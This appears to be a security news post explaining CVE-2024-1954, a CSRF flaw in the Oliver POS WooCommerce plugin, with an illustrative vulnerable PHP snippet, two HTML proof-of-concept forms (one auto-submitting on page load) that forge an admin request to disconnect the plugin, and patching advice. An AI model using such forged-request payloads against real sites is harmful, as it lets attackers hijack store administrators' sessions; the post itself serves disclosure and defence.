CVE CyberSecurity Database News

CVE-2024-1954 - Critical CSRF Vulnerability in Oliver POS - What You Need to Know and Exploitation Details

Poster -

TL;DR:
A simple Cross-Site Request Forgery (CSRF) flaw in the Oliver POS WooCommerce plugin (up to version 2.4.1.8) allows remote attackers to perform unauthorized admin actions—including deactivating the plugin—if an admin is tricked into clicking a malicious link. This post explains how the vulnerability works, why it’s dangerous, a sample exploit, and how to protect your site.

What is Oliver POS and What Went Wrong?

Oliver POS is a widely-used WordPress plugin that turns WooCommerce shops into point-of-sale systems. Unfortunately, in every version up to and including 2.4.1.8, it’s possible for attackers to abuse a critical flaw: the plugin fails to *properly validate security nonces* in several key requests handled by includes/class-pos-bridge-install.php.

This failure means that a hacker can craft a forged request to take unwanted admin actions—if they can simply get a site admin to visit a link or webpage they control, like in a phishing email.

Why is This Bad?

CSRF (Cross-Site Request Forgery) attacks are sneaky. They let someone else make your browser perform actions *as you* (if you’re logged in)—like pressing a button in your WordPress backend—without your knowledge.

*Potentially more—whatever functions don’t check nonces!*

If your WooCommerce store relies on Oliver POS, this is a big deal: you may lose sales and admin control in the blink of an eye.

Where’s the Bug?

Normally, actions triggered in WordPress admin via AJAX or form submit require a “nonce” (a unique security token) as proof, so another site can’t trick you into submitting forms. But in Oliver POS, the PHP file includes/class-pos-bridge-install.php lacks this validation or implements it incorrectly for several admin actions.

The code might look similar to this simplified example (note: this is illustrative, not a verbatim excerpt):

// In includes/class-pos-bridge-install.php

if ( isset( $_POST['disconnect_subscription'] ) ) {
    // Missing: check_admin_referer( 'oliver_pos_disconnect' ); 
    $this->disconnect_subscription();
}

// Insecure! No nonce or referer validation.

A secure version should include a line like

check_admin_referer( 'oliver_pos_disconnect' );

or similar, to validate the request.

How Could An Exploit Work? (Example)

Suppose a site admin is logged in to their WordPress backend. An attacker sends them an email with a hidden form or iframed request like:

<form action="https://store.example.com/wp-admin/admin-post.php"; method="POST">
    <input type="hidden" name="disconnect_subscription" value="1">
    <!-- No nonce required due to vulnerability -->
    <input type="submit" value="Click Here for a Free Coupon">
</form>

And in a real-world attack, this could be automatically submitted via JavaScript as soon as the admin opens the link:

<body onload="document.forms[].submit()">
    <form action="https://store.example.com/wp-admin/admin-post.php"; method="POST">
        <input type="hidden" name="disconnect_subscription" value="1">
    </form>
</body>

Once the admin visits, the plugin is forcefully disconnected—no password needed, no warning.

If more actions are possible (like plugin deactivation or syncing status), those could easily be hijacked in the same manner.

Official References & Advisories

- WPScan Vulnerability Entry
- Oliver POS plugin page
- WordPress CSRF documentation

How Do I Know if I’m Affected?

If your Oliver POS plugin is version 2.4.1.8 or below, you are at risk.
Check via:
WP Admin > Plugins > Oliver POS

Update the Plugin:

Check for any updates to Oliver POS and apply them immediately. (Check official plugin page for updates.)

Limit Admin Exposure:

Until patched, avoid clicking unknown links or opening HTML-rich emails while logged into your WordPress admin.

Implement Security Plugins:

Use WordPress security tools like Wordfence or Sucuri to add extra CSRF protections and monitoring.

Custom Patch (Advanced Users):

If you must keep using an affected version, you can manually add nonce checks to includes/class-pos-bridge-install.php wherever critical actions are handled (see https://developer.wordpress.org/plugins/security/nonces/ for how).

Final Thoughts

While Cross-Site Request Forgery feels “invisible,” it’s a powerful attack—especially in eCommerce environments. CVE-2024-1954 is easy to exploit, harder to detect, and could quickly cripple your store operations. Until an official patch ships, update or take strong precautions.


Stay safe and watch for security advisories!

*Feel free to share this post with other WooCommerce shop owners using Oliver POS. For more technical info, check the references above.*

Timeline

Published on: 02/28/2024 09:15:43 UTC
Last modified on: 02/28/2024 14:06:45 UTC